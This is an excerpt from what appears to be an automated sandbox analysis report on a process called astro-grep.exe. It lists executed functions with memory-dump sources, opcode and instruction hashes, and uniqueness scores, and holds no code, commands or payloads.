                                                                                                            Analysis Process: astro-grep.exe PID: 2792 Parent PID: 3352 astro-grep.exeCOMMON

                                                                                                            Executed Functions

                                                                                                            Function 025F06B1, Relevance: 1.4, Strings: 1, Instructions: 112COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000011.00000002.310763240.00000000025F0000.00000040.00000001.sdmp, Offset: 025F0000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: PU
                                                                                                            • API String ID: 0-1993420189
                                                                                                            • Opcode ID: 1b9409f093601a01b3fe0e3549e094993c24d758f65766b3f2426a55886fb9fc
                                                                                                            • Instruction ID: d48cb2ac2e9121c008047da0d732ef4cb978bb2e7c70ffa026b1ec9a955ee818
                                                                                                            • Opcode Fuzzy Hash: 1b9409f093601a01b3fe0e3549e094993c24d758f65766b3f2426a55886fb9fc
                                                                                                            • Instruction Fuzzy Hash: 4151CB3D682205CFD746FF7CE8644597362FB89A05360C929D401DB268EB39AD06CF80
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 025F0F48, Relevance: .1, Instructions: 85COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000011.00000002.310763240.00000000025F0000.00000040.00000001.sdmp, Offset: 025F0000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 559d5c0179276a8830b2e263cd4b11a2f1fe3c57c04535769556c62a1f993f5c
                                                                                                            • Instruction ID: f34eb98e9137f4d63fc344eb0e2282eafec9496887a51da9e4e826a0807731b4
                                                                                                            • Opcode Fuzzy Hash: 559d5c0179276a8830b2e263cd4b11a2f1fe3c57c04535769556c62a1f993f5c
                                                                                                            • Instruction Fuzzy Hash: D921BF30B002158FCB54EB798861AAEBBF2AF88614B29447DE645DB395EF70DC058791
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00E9D1D8, Relevance: .1, Instructions: 76COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000011.00000002.310650486.0000000000E9D000.00000040.00000001.sdmp, Offset: 00E9D000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 7947564f64d2d9fa0738fbfff51a714bcb3eca0893c6a0fe0d506530e5259714
                                                                                                            • Instruction ID: 084641d0fb93638977c6787f0bc783ad75d416098a25ec758861488eb88c725d
                                                                                                            • Opcode Fuzzy Hash: 7947564f64d2d9fa0738fbfff51a714bcb3eca0893c6a0fe0d506530e5259714
                                                                                                            • Instruction Fuzzy Hash: B12125B2508300DFCF05CF54DDC0B66BB65FB88318F24C669E9055B256C33AD856DBA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00E9D4A0, Relevance: .1, Instructions: 75COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000011.00000002.310650486.0000000000E9D000.00000040.00000001.sdmp, Offset: 00E9D000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: ce1cd30ab8d08a18bca036e911858929212c625a7b035eed8eef1f41595ca2df
                                                                                                            • Instruction ID: 773e190019e48736c1907b02b068a58d67ac9f885759d13511f87f4d3f3ce680
                                                                                                            • Opcode Fuzzy Hash: ce1cd30ab8d08a18bca036e911858929212c625a7b035eed8eef1f41595ca2df
                                                                                                            • Instruction Fuzzy Hash: EC2125B1508240DFDF05CF54DDC0B6ABF65FB88328F24C569E9095B246C33AD845DBA2
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 025F05A8, Relevance: .1, Instructions: 71COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000011.00000002.310763240.00000000025F0000.00000040.00000001.sdmp, Offset: 025F0000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 0a55a25fc5c48c8378c4ffbde2c1ec04e18a1a669d05ecd99ba26c88ea07c875
                                                                                                            • Instruction ID: 7a984e6b984107295a823e4df2f875846e71338ca51ccfe06eb92586b65ee305
                                                                                                            • Opcode Fuzzy Hash: 0a55a25fc5c48c8378c4ffbde2c1ec04e18a1a669d05ecd99ba26c88ea07c875
                                                                                                            • Instruction Fuzzy Hash: E621D7306012229FDFD46B76D84473E3FA47F89746B181828DA07D52DAEF70D404CE95
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 025F0E4D, Relevance: .1, Instructions: 68COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000011.00000002.310763240.00000000025F0000.00000040.00000001.sdmp, Offset: 025F0000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: d6bf18b5cbd01c831b04018edc14287b6aa9d9bf52db412544deff87a5171155
                                                                                                            • Instruction ID: 93b12f87697cbafc66e8ee4607772dcd24ad37d63e513bf1aeceed0500cb54b2
                                                                                                            • Opcode Fuzzy Hash: d6bf18b5cbd01c831b04018edc14287b6aa9d9bf52db412544deff87a5171155
                                                                                                            • Instruction Fuzzy Hash: F8119070B042055FDB48ABBC48103AEB5EA9FC9204F11483ED50AEBB85EF348D0943E2
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00E9D1D3, Relevance: .1, Instructions: 57COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000011.00000002.310650486.0000000000E9D000.00000040.00000001.sdmp, Offset: 00E9D000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: eb0b3204f9e54c91ba6177012692110fc637dc3b94983174fde465a6509cb3ac
                                                                                                            • Instruction ID: e1d6f9d7c7072b418c56f690c419685f1d3aeaf8b5eb47350c4b4da045aac6e1
                                                                                                            • Opcode Fuzzy Hash: eb0b3204f9e54c91ba6177012692110fc637dc3b94983174fde465a6509cb3ac
                                                                                                            • Instruction Fuzzy Hash: C9216D76508280DFCF16CF50D9C4B56BF71FB84314F2886A9D8485B656C33AD86ACBA2
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00E9D49B, Relevance: .1, Instructions: 56COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000011.00000002.310650486.0000000000E9D000.00000040.00000001.sdmp, Offset: 00E9D000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: a7aa71d7344cb9ef96c43aa9f523a1710f819d5ec3c422f98cc3a8be254e3fa2
                                                                                                            • Instruction ID: 5a674573af63b8be553ac8ed7b3f7079e76c6d5e37550988931b8c7f1a19ccec
                                                                                                            • Opcode Fuzzy Hash: a7aa71d7344cb9ef96c43aa9f523a1710f819d5ec3c422f98cc3a8be254e3fa2
                                                                                                            • Instruction Fuzzy Hash: E411E676408280CFCF12CF14D9C4B16BF71FB84328F28C6A9D8051B656C336D85ACBA2
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 025F1040, Relevance: .1, Instructions: 53COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000011.00000002.310763240.00000000025F0000.00000040.00000001.sdmp, Offset: 025F0000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: e57883a55b1a8dd71c95d88978ffb507a18beaf931a68a30fb04093db3cdac53
                                                                                                            • Instruction ID: 7a968404f2f3f61b87c02606aba1939208213f98bb3bc0b79b3f7f7cdbf8269d
                                                                                                            • Opcode Fuzzy Hash: e57883a55b1a8dd71c95d88978ffb507a18beaf931a68a30fb04093db3cdac53
                                                                                                            • Instruction Fuzzy Hash: 5111E134B00204CFCB94EB78C918A6A77E5BF896147158878D10ADB710EF34DC05CB91
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 025F0A80, Relevance: .0, Instructions: 24COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000011.00000002.310763240.00000000025F0000.00000040.00000001.sdmp, Offset: 025F0000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: f07dcfba4f57479c78d05e2134b4fd23588e538c55aedcc7c417219bd9ec593a
                                                                                                            • Instruction ID: 34a1be522e456695801138bb9edb40c83986a8c1b5f55ae5f19e20b4a6a717f4
                                                                                                            • Opcode Fuzzy Hash: f07dcfba4f57479c78d05e2134b4fd23588e538c55aedcc7c417219bd9ec593a
                                                                                                            • Instruction Fuzzy Hash: 7AE0C2327001005F8344977EA88489FB7DAEFCE5B9314807AF10AC7322CE70DC058790
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Non-executed Functions